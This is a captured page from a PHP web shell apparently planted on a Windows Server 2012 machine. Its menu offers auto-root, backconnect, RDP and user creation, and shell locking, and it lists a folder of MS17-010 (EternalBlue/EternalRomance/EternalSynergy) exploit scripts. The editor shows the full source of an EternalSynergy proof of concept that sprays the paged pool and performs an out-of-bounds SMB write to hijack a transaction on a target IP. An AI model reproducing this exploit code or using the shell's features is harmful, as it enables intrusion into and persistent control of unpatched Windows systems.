Windows NT SRV-DATA 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
: 192.168.213.201 | : 216.73.216.72
Cant Read [ /etc/named.conf ]
8.2.0
ADMINISTRATEUR
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ E ]
[ Z ]
C: /
Users /
admin /
Desktop /
MS17-010-master /
[ HOME SHELL ]
Name
Size
Permission
Action
shellcode
[ DIR ]
drwxrwxrwx
BUG.txt
27.13
KB
-rw-rw-rw-
Nouveau document texte.txt
0
B
-rw-rw-rw-
README.md
3.29
KB
-rw-rw-rw-
checker.py
2.44
KB
-rw-rw-rw-
eternalblue_exploit7.py
25.12
KB
-rw-rw-rw-
eternalblue_exploit8.py
23.51
KB
-rw-rw-rw-
eternalblue_poc.py
3.71
KB
-rw-rw-rw-
eternalchampion_leak.py
1.51
KB
-rw-rw-rw-
eternalchampion_poc.py
2.53
KB
-rw-rw-rw-
eternalchampion_poc2.py
5.8
KB
-rw-rw-rw-
eternalromance_leak.py
1.61
KB
-rw-rw-rw-
eternalromance_poc.py
948
B
-rw-rw-rw-
eternalromance_poc2.py
4.99
KB
-rw-rw-rw-
eternalsynergy_leak.py
1.82
KB
-rw-rw-rw-
eternalsynergy_poc.py
2.95
KB
-rw-rw-rw-
infoleak_uninit.py
1.08
KB
-rw-rw-rw-
mysmb.py
16.28
KB
-rw-rw-rw-
mysmb.pyc
16.68
KB
-rw-rw-rw-
npp_control.py
1.8
KB
-rw-rw-rw-
pip.py
2.98
KB
-rw-rw-rw-
python
0
B
-rw-rw-rw-
smbold.py
41
KB
-rw-rw-rw-
win7.py
26.09
KB
-rw-rw-rw-
zzz_exploit.py
42.4
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : eternalsynergy_poc.py
from mysmb import MYSMB from impacket import smb from struct import pack, unpack import sys ''' PoC: demonstrates how NSA eternalromance and eternalsynergy does the transaction alignment with large paged pool Note: - This method is less reliable than matched-pair method and has higher chance to crash a target - I add this method to show how to spraying heap with large paged pool only The exploit method uses only large paged pool for spraying heap. All transaction structs are at start of memory page. The OOB write bug need to overwrite data on the next memory page. There are 2 cases to make the target crashes. - The next memory page is invalid (page fault) - The next memory page is other data structure Comparing to matched-pair method, the OOB write always writes at valid memory address because the written address is in same page as allocated transaction. Moreover, if the written address is not our transaction struct, it is likely to be free chunk data (failed but not crash the target). ''' USERNAME = '' PASSWORD = '' if len(sys.argv) != 3: print("{} <ip> <pipe_name>".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] pipe_name = sys.argv[2] conn = MYSMB(target) conn.login(USERNAME, PASSWORD) tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$') conn.set_default_tid(tid) tid2 = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$') fid = conn.nt_create_andx(tid, pipe_name) print('Sending 50 frag packets (25 to free)') # paged pool size 0x8000 ... 0xc000 for i in range(5): for j in range(7, 0xc): size = (j * 0x1000) + 0xe00 conn.send_trans(pack('<HH', 0x36, fid), totalDataCount=size, maxDataCount=0) conn.send_trans(pack('<HH', 0x36, fid), totalDataCount=size, maxDataCount=0, tid=tid2) # conn.send_trans(pack('<HH', 0x36, fid), totalDataCount=0x7e00, maxDataCount=0) conn.send_trans(pack('<HH', 0x36, fid), totalDataCount=0x7e00, maxDataCount=0, tid=tid2) # free 25+1 transactions (create 25 holes) conn.disconnect_tree(tid2) print('Sending 40 padding packets') # fill all large holes (size >= 0x10000) for i in range(40): conn.send_trans(pack('<HH', 0x36, fid), totalDataCount=0xfe80, maxDataCount=0) # Hope no hole for large paged pool left reqs = [] for i in range(7): mid = fid if i == 2 else None reqs.append(conn.create_trans_packet(pack('<HH', 0x36, fid), mid=mid, totalDataCount=0xfe80, maxDataCount=0)) conn.send_raw(''.join(reqs)) for i in range(7): conn.recvSMB() # smb write raw named pipe conn.do_write_andx_raw_pipe(fid, 'A'*512) # OOB write conn.send_trans_secondary(fid, data='\x00\x00', dataDisplacement=0xfdc0) # test OOB write result by sending a secondary with mid=0 and bad data displacement conn.send_trans_secondary(0, data='\x00', dataDisplacement=0xffff) # if success, the target must reply an error # if no reply, fail recvPkt = conn.recvSMB() if recvPkt.getNTStatus() != 0: print('Successfully took over a transaction') else: print('Fail to took over a transaction') conn.disconnect_tree(tid) conn.logoff() conn.get_socket().close()
Close